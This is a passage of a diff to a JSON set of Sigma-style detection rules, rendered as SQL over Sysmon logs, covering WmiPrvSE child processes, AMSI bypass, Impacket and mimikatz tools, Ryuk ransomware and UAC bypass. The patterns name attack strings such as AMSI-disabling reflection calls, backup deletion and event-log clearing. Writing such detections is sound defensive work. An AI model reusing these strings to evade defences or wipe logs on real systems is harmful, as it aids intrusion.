"Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE 